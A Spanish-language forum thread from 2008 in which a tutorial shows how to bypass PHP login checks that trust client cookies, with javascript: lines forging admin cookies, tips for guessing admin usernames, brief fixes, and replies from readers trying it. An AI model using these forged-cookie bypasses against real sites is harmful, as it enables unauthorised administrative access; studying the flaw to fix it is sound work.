Tutorial Insecure Cookie Handling [ By InyeXion ]

04-oct-2008, 05:43

Insecure Cookie Handling

[~] - Explicación

Insecure Cookie Handling (inseguridad en el manejo de cookies) esta vulnerabilidad la vemos cada ves mas en sitios de seguridad web(Seguridad en apps webs..), pero hay muchos que todavía no saben de que se trata, no saben como explotarla o no la entienden por diferentes motivos..., espero solventar las dudas que tengan con este tutorial.

Esta vulnerabilidad depende del perfil en la que la veamos puede parecer tonta o ingeniosa. Tonta diría por la forma en la que los programadores administran las cookies para restringir la sección de los usuarios no autorizados, e ingeniosa por la forma que los atacantes burlan la verificación...

Cookies: Las cookies forman parte del protocolo HTTP, este protocolo se usa para intercambiar mensajes entre el servidor y el cliente utilizando solicitudes y respuestas HTTP. El encabezado HTTP reservado para el uso de las cookies se denomina

Set-Cookie. Está compuesto por valores:

Set-Cookie: nombre=valor; domain=nombre de dominio; expires=vencimiento de la cookie; path=ruta donde la cookie sera validada; secure

Ejemplo:

Código:

Set-Cookie: admin=1; domain=www.web.com; expires=Friday, 2-Feb-2009 00:00:00 GMT; path=/; secure

Secure: Solo se usa si la cookie es enviada por conexion segura (SSL) y es opcional.

[~] - Explotacion

La explotación es muy fácil, creo que muchos ya se la están imaginando..., pondremos algunos ejemplos.

Código:

<?
if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == 1)
{
echo "Bienvenido a la administración...";

}else{

echo "No estas autorizado";

}
?>

En este caso tendríamos que crear una cookie con el valor 1. Lo haremos en JavaScript pero se puede hacer con un plugin de Firefox o cualquier herramienta, el objetivo es crear la cookie. Entonces ingresaremos en el sitio y previamente ponemos en la barra del navegador...

Código:

javascript:document.cookie="admin=1; path=/";

Ahora entramos nuevamente al login y tendrás acceso a la administración en este caso...

Otro ejemplo:

Código:

<?
if($_COOKIE['user'] == 1 && $_COOKIE['pass'] == 1)
{
echo "Autorizado";
}else{
echo "No autorizado";
}
?>

Como en el caso anterior entramos a la web e insertamos..

Código:

javascript:document.cookie="user=1; path=/"; document.cookie="pass=1; path=/";

Ahí creamos 2 cookies la cual sirven para pasar la verificación. Entramos nuevamente a la web siendo ya autorizado.

Vamos con el ultimo ejemplo:

Código:

<?

$user = md5(base64_encode("admin"));

if($_COOKIE['usuario'] == $user && $_COOKIE['pass'] == 1)
{
echo "Administración";
}else{
echo "Acceso Incorrecto";
}
?>

Bueno hay que explicar unas cositas de este ejemplo, primero tenemos que saber como sacar el nombre del usuario para que posteriormente podamos encriptar primero en base64 y después en md5, como no somos magos como para adivinar el usuario tenemos que usar la lógica... bien puede ser un nombre de usuario por default (como admin, administrador etc..) o sino nos podemos fijar quien postea en la web, en la mayoria de los CMS dice el usuario que posteo. Supongamos que tiene como usuario "admin" (como el script de arriba) entonces encriptamos el usuario para que podamos crear la cookie con ese valor como muestro abajo:

Código:

javascript:document.cookie="usuario=db69fc039dcbd2962cb4d28f5891aae1; path=/"; document.cookie="pass=1; path=/";

Asi creando las cookies tendremos nuevamente acceso a la administracion...!

[~] - Posibles Soluciones

Podemos utilizar cookies pero manejarlas de la forma correcta para que no puedan bypassear la verificación, con manejarla de la forma correcta me refiero a que no hagan una verificacion estatica, que sea dinamica depende del administrador, ejemplo que en la cookie guarde un usuario(elejido por el admin previamente) y la contraseña codificadas, entre otras posibilidades...
Tambien podemos combinar verificaciones ejemplo cookies y sessiones, queda a imaginacion de uno de como armar la verificacion siempre y cuando este seguro que la verificación sea segura...

[~] - Links

[Solo usuarios registrados pueden ver los links. REGISTRARSE]

<-- Live HTTP Headers 0.14

[Solo usuarios registrados pueden ver los links. REGISTRARSE]

<-- Add N Edit Cookies 0.2.1.3

Salud0Z!

CiberTron · 04-oct-2008, 12:39

Muy bueno bro gracias por la informacion

saludos

15-oct-2008, 20:51

muy buen el tuto....leer, practicar y aplicar

saludos

0cool.p.r · 24-dic-2008, 17:07

hola amigos ami me salio lo q ven en la imagen

pero todavia no tengo acceso a la administracion

resident evil 04 · 25-dic-2008, 03:20

la verdad entiendo casi todo el unico dilema es como subo el cookie.php explotado, al firefox

25-dic-2008, 14:32

Cita:

Iniciado por 0cool.p.r

hola amigos ami me salio lo q ven en la imagen

pero todavia no tengo acceso a la administracion

Ahi crea la cookie en tu navegador, despues tienes q entrar a la url donde esta el login q supuestamente requiere esa cookie con tal valor...

Cita:

Iniciado por resident evil 04

la verdad entiendo casi todo el unico dilema es como subo el cookie.php explotado, al firefox

No entiendo a que te refieres cuando dices subo el cookie.php explotado..., el archivo php contiene una verificacion de login la cual puede tener cualquier web... y se puede evadir en este caso creando la cookie con valor 1.

saludos

s/a2h · 12-abr-2009, 23:01

Hola!!

Ya tiene tiempo este post pero vale la pena que se valla hasta arriba con este Gracias!!

salu2!!!

Doddy · 16-abr-2009, 18:02

Esta bueno
no conocia esa vulnerabilidad !

04-oct-2008, 12:39	#2
CiberTron Gran Colaborador Fecha de Ingreso: abril-2008 Ubicación: Argentina Amigos 1 Mensajes: 1.182 Gracias: 2 Agradecido 24 veces en 17 mensajes.	Re: Tutorial Insecure Cookie Handling [ By InyeXion ] Muy bueno bro gracias por la informacion saludos __________________ como dice el maestro aprende escuchar y no te creas que te la sabe todas todos fuimos novatos que aprendimos y ahora que sabes y sos algo importante no te la des de savioondo ayuda y enseña , por que siempre viene uno detras que quiere aprender mas

15-oct-2008, 20:51	#3
gui3 Guest Amigos Mensajes: n/a	Re: Tutorial Insecure Cookie Handling [ By InyeXion ] muy buen el tuto....leer, practicar y aplicar saludos

24-dic-2008, 17:07	#4
0cool.p.r Habitual Fecha de Ingreso: julio-2008 Amigos 0 Mensajes: 212 Gracias: 0 Agradecido 0 veces en 0 mensajes.	Re: Tutorial Insecure Cookie Handling [ By InyeXion ] hola amigos ami me salio lo q ven en la imagen pero todavia no tengo acceso a la administracion

25-dic-2008, 03:20	#5
resident evil 04 Novato Fecha de Ingreso: diciembre-2008 Amigos 0 Mensajes: 31 Gracias: 0 Agradecido 0 veces en 0 mensajes.	Re: Tutorial Insecure Cookie Handling [ By InyeXion ] la verdad entiendo casi todo el unico dilema es como subo el cookie.php explotado, al firefox

12-abr-2009, 23:01	#7
s/a2h Veterano Fecha de Ingreso: agosto-2005 Amigos 0 Mensajes: 707 Gracias: 0 Agradecido 14 veces en 10 mensajes.	Re: Tutorial Insecure Cookie Handling [ By InyeXion ] Hola!! Ya tiene tiempo este post pero vale la pena que se valla hasta arriba con este Gracias!! salu2!!! __________________

16-abr-2009, 18:02	#8
Doddy Yes! I am invincible! Fecha de Ingreso: febrero-2009 Ubicación: Infierno Amigos 32 Mensajes: 2.408 Gracias: 0 Agradecido 156 veces en 112 mensajes.	Re: Tutorial Insecure Cookie Handling [ By InyeXion ] Esta bueno no conocia esa vulnerabilidad ! __________________

Herramientas
Mostrar Versión Imprimible Enviar por Correo
Desplegado
Mode Lineal Cambiar a Modo Hibrido Cambiar a Modo Hilado

Temas Similares
Tema	Autor	Foro	Respuestas	Último mensaje
PHPAuctionSystem Insecure Cookie Handling Vuln.	Doddy	Directorio de Exploits	0	15-feb-2009 10:41
H2O-CMS <= 3.4 Insecure Cookie Handling Vulnerability	BUSik49	Directorio de Exploits	0	29-oct-2008 10:20
Tlnews 2.2 Insecure Cookie Handling Vulnerability	BUSik49	Directorio de Exploits	0	26-oct-2008 12:13
phpFastNews 1.0.0 Insecure Cookie Handling Vulnerability	BUSik49	Directorio de Exploits	0	18-oct-2008 14:55
BbZL.PhP 0.92 Insecure Cookie Handling Vulnerability	BUSik49	Directorio de Exploits	0	29-sep-2008 12:47